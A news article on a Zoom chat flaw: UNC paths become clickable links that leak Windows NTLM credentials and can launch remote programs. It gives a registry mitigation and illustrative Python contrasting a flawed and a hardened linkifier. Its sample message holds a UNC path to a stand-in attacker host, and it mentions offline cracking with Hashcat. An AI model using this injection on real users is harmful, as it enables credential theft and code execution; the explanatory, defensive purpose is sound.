Zoom is enjoying an astronomical increase in its daily user base, but that increased attention has also meant increased scrutiny and criticism about how it handles transparency, security, and data collection. Last week, Twitter user Mitch (@_g0dmode) pointed out a vulnerability in the Zoom client's automatic link conversion in chat, claiming that it could expose Windows logins and passwords. On Tuesday, BleepingComputer looked into the issue and confirmed that it's possible not only to compromise credentials, but even to launch programs on unsuspecting users' computers.
UNC path injection and leak — Whenever you send a URL through Zoom's messaging feature, the client converts it into a clickable link. It does the same for UNC paths, the Windows network paths of the form \\server\share\file. The problem is that when someone clicks such a converted link, Windows tries to reach the remote host over the SMB file-sharing protocol and authenticates to it automatically, sending the user's Windows username together with an NTLM challenge-response derived from the account password. An attacker who controls that server captures the response and can crack it offline; freely available tools like Hashcat make recovering the corresponding password straightforward. Yikes.
16 Seconds and you're in — Both BleepingComputer and @_g0dmode outline how easily this flaw can be exploited. How quickly the password is recovered depends on its complexity: in one case, BleepingComputer cracked a "fairly easy password" in about 16 seconds.
On top of leaking credentials, the same trick can be used to launch programs: the UNC link can point at an executable on the attacker's share, and clicking it makes Windows run that program. The only consolation in this scenario is that Windows shows a warning prompt before the program is opened.
What Zoom needs to do — The problem lies in Zoom's chat feature. The client shouldn't automatically convert UNC paths into clickable links; a URL that starts with http:// or https:// is a reasonable thing to linkify, a path that starts with two backslashes is not. So far, the company hasn't deployed any corrective measures, but if you already use Zoom on Windows and want to mitigate your risk, BleepingComputer suggests a Group Policy fix, described in its official report: set "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" (under Security Settings, Local Policies, Security Options) to "Deny all". On a standalone machine the same setting is the registry value RestrictSendingNTLMTraffic = 2 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0. Note the caveat: this stops Windows from sending NTLM credentials to any remote server, so file shares or services that only accept NTLM will stop working unless you list them under the companion "Add remote server exceptions for NTLM authentication" policy. It also does nothing about the link conversion itself; that part only Zoom can fix.
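To make the mechanism and the fix concrete, here is a small model of a chat "linkifier" in Python. It is an added example written for this article, not Zoom's code, and the function names (linkify_naive, linkify_hardened, find_unc_paths) and the sample messages are constructed for illustration. The naive version mirrors the behaviour described above, turning a UNC path into a clickable file:// link that points at an SMB share, which is exactly what triggers the automatic NTLM authentication when clicked. The hardened version only linkifies http(s) URLs and leaves a UNC path as inert text, and a small detector shows how you would flag such paths in chat logs or outbound messages.

```python
import html
import re

# A UNC path: two leading backslashes, a host name, a backslash, then a share/file path.
# Example (constructed): \\attacker.example\share\report.docx
UNC_RE = re.compile(r'\\\\[A-Za-z0-9._-]+\\[^\s<>"]+')

# An ordinary web URL, the only thing a chat client should ever turn into a link.
URL_RE = re.compile(r'https?://[^\s<>"]+')


def _token_to_html(token: str, allow_unc: bool) -> str:
    """Render one whitespace-delimited token as escaped text or as an <a> link."""
    if URL_RE.fullmatch(token):
        safe = html.escape(token)
        return f'<a href="{safe}">{safe}</a>'
    if allow_unc and UNC_RE.fullmatch(token):
        # \\host\share\file becomes file://host/share/file. When a Windows user clicks
        # this, the OS opens an SMB connection to "host" and authenticates with the
        # logged-in account's NTLM credentials, which the attacker's server records.
        href = "file:" + token.replace("\\", "/")
        return f'<a href="{html.escape(href)}">{html.escape(token)}</a>'
    return html.escape(token)


def _linkify(message: str, allow_unc: bool) -> str:
    # Split on runs of whitespace but keep the separators so spacing is preserved.
    parts = re.split(r"(\s+)", message)
    return "".join(p if p.isspace() else _token_to_html(p, allow_unc) for p in parts)


def linkify_naive(message: str) -> str:
    """The flawed behaviour: URLs *and* UNC paths become clickable links."""
    return _linkify(message, allow_unc=True)


def linkify_hardened(message: str) -> str:
    """The fix: only http(s) URLs become links; UNC paths stay as plain text."""
    return _linkify(message, allow_unc=False)


def find_unc_paths(message: str) -> list:
    """Detection helper: return every UNC path embedded in a chat message."""
    return UNC_RE.findall(message)


if __name__ == "__main__":
    # Constructed sample chat message; the host name is fictitious.
    msg = "meeting notes: \\\\attacker.example\\share\\report.docx and https://example.com/agenda"
    print("UNC paths found:", find_unc_paths(msg))
    print("naive:   ", linkify_naive(msg))
    print("hardened:", linkify_hardened(msg))
```

Run with the Windows client mental model in mind: the href the naive version emits is the payload, and the hardened output is what a chat client should send to the renderer. The detector is useful on its own for scanning exported chat history for links that were delivered before a fix shipped.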
Automatic link conversion leading to credential leaks isn't the only problem Zoom has right now. The company is under considerable public scrutiny over how much more power it gives meeting hosts and corporate-tier administrators than attendees. From its attention tracking tool and data collection practices to hosts being able to access personal data like operating system information, location data, audiovisual specs, and more, the widely used video-conferencing tool has major work to do.